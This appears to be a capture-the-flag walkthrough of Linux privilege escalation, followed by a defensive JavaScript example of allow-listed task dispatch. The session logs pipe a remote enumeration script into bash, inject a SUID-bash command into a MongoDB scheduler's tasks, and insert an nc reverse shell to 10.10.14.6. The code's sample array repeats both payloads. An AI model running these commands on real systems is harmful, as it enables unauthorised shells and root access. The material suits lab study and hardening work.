find / -type f -perm -04000 -ls 2>/dev/null
curl http://10.10.14.6/linenum.sh | bash
cat /var/scheduler/app.js
It looks like app.js runs each task's command (a system command) as a child process, then deletes the task.
mark@node:~$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( {"cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6661beb7ec323c4579a20eae"), "cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" }
> db.tasks
scheduler.tasks
>
mark@node:/tmp$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks.insert( {"cmd" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.6 1337 >/tmp/f" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
>
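The scheduler described above executes whatever string a task document carries in cmd, so anyone who can write to scheduler.tasks gets command execution as the scheduler's user. The block below is an added example, not the code in /var/scheduler/app.js: it sketches how such a scheduler could dispatch tasks from a fixed job table without a shell. The job names, paths and the job/args fields are hypothetical.

```javascript
// Added example: allow-list dispatch for a task scheduler (hypothetical names throughout).
const { execFile } = require('child_process');

// Hypothetical job table: the only programs the scheduler may start.
// Each job has a fixed executable and one validator per argument.
const JOBS = {
  backup: { file: '/usr/local/bin/backup.sh', args: [/^[a-z0-9_-]{1,32}$/] },
  rotate: { file: '/usr/sbin/logrotate', args: [/^\/etc\/logrotate\.d\/[a-z0-9_-]+$/] },
};

// Turn a task document into {file, args}, or null if it must not run.
function resolveTask(doc) {
  if (!doc || typeof doc !== 'object') return null;
  if ('cmd' in doc) return null; // free-form command strings are never executed
  if (typeof doc.job !== 'string') return null;
  if (!Object.prototype.hasOwnProperty.call(JOBS, doc.job)) return null;
  const spec = JOBS[doc.job];
  const args = Array.isArray(doc.args) ? doc.args : [];
  if (args.length !== spec.args.length) return null;
  for (let i = 0; i < args.length; i++) {
    if (typeof args[i] !== 'string' || !spec.args[i].test(args[i])) return null;
  }
  return { file: spec.file, args };
}

// Run an accepted task without a shell, so ';', '|' and '>' are plain argument bytes.
function runTask(doc, done) {
  const t = resolveTask(doc);
  if (!t) return done(new Error('task rejected'));
  execFile(t.file, t.args, { shell: false, timeout: 30000 }, done);
}

// Constructed sample documents; the two "cmd" entries are the tasks from the session above.
const SAMPLES = [
  { cmd: 'cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;' },
  { cmd: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.6 1337 >/tmp/f' },
  { job: 'backup', args: ['nightly; id'] },
  { job: 'backup', args: ['nightly'] },
];

// Decide for each sample whether the scheduler would run or reject it.
function decisions() {
  return SAMPLES.map((d) => (resolveTask(d) ? 'run' : 'reject'));
}

console.log(decisions());
```

Validation only narrows what a task can start; write access to the tasks collection still needs to be limited to the accounts that legitimately schedule jobs.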